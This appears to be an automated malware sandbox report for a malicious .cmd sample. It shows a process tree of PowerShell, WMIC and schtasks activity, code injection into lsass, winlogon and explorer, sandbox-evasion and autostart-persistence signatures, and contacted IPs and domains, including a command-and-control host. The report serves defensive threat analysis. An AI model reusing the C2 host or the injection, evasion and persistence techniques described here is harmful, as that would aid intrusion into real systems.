behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1524984 Sample: 1 (2).cmd Startdate: 03/10/2024 Architecture: WINDOWS Score: 100 81 azure-winsecure.com 2->81 83 ipwho.is 2->83 93 Suricata IDS alerts for network traffic 2->93 95 Malicious sample detected (through community Yara rule) 2->95 97 .NET source code references suspicious native API functions 2->97 99 14 other signatures 2->99 13 cmd.exe 1 2->13         started        16 powershell.exe 2->16         started        signatures3 process4 signatures5 129 Suspicious powershell command line found 13->129 131 Suspicious command line found 13->131 18 powershell.exe 33 13->18         started        22 WMIC.exe 1 13->22         started        24 WMIC.exe 1 13->24         started        30 4 other processes 13->30 133 Writes to foreign memory regions 16->133 135 Modifies the context of a thread in another process (thread injection) 16->135 137 Injects a PE file into a foreign processes 16->137 26 dllhost.exe 16->26         started        28 conhost.exe 16->28         started        process6 file7 79 C:\Windows\$rbx-onimai2\$rbx-CO2.bat, DOS 18->79 dropped 101 Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines) 18->101 103 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 18->103 105 Uses schtasks.exe or at.exe to add and modify task schedules 18->105 113 4 other signatures 18->113 32 cmd.exe 1 18->32         started        35 WerFault.exe 20 16 18->35         started        107 Injects code into the Windows Explorer (explorer.exe) 26->107 109 Contains functionality to inject code into remote processes 26->109 111 Writes to foreign memory regions 26->111 115 3 other signatures 26->115 37 winlogon.exe 26->37 injected 39 lsass.exe 26->39 injected 41 svchost.exe 26->41 injected 43 17 other processes 26->43 signatures8 process9 signatures10 89 Suspicious powershell command line found 32->89 45 powershell.exe 32->45         started        47 conhost.exe 32->47         started        49 cmd.exe 1 32->49         started        process11 process12 51 cmd.exe 1 45->51         started        signatures13 117 Suspicious powershell command line found 51->117 119 Suspicious command line found 51->119 54 powershell.exe 51->54         started        58 WMIC.exe 1 51->58         started        60 WMIC.exe 1 51->60         started        62 4 other processes 51->62 process14 dnsIp15 85 azure-winsecure.com 154.216.20.132, 63301, 6969 SKHT-ASShenzhenKatherineHengTechnologyInformationCo Seychelles 54->85 87 ipwho.is 195.201.57.90, 443, 63304 HETZNER-ASDE Germany 54->87 121 Creates autostart registry keys with suspicious values (likely registry only malware) 54->121 123 Creates autostart registry keys with suspicious names 54->123 125 Creates an autostart registry key pointing to binary in C:\Windows 54->125 127 6 other signatures 54->127 64 powershell.exe 54->64         started        67 schtasks.exe 54->67         started        69 WerFault.exe 54->69         started        71 WerFault.exe 54->71         started        signatures16 process17 signatures18 91 Injects a PE file into a foreign processes 64->91 73 conhost.exe 64->73         started        75 powershell.exe 64->75         started        77 conhost.exe 67->77         started        process19
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
154.216.20.132
 azure-winsecure.com Seychelles
135357 SKHT-ASShenzhenKatherineHengTechnologyInformationCo true
195.201.57.90
 ipwho.is Germany
24940 HETZNER-ASDE false

Contacted Domains

Name IP Active
bg.microsoft.map.fastly.net 199.232.214.172 true
ipwho.is 195.201.57.90 true
azure-winsecure.com 154.216.20.132 true

Contacted URLs

Name Malicious Antivirus Detection Reputation
https://ipwho.is/ false
    		unknown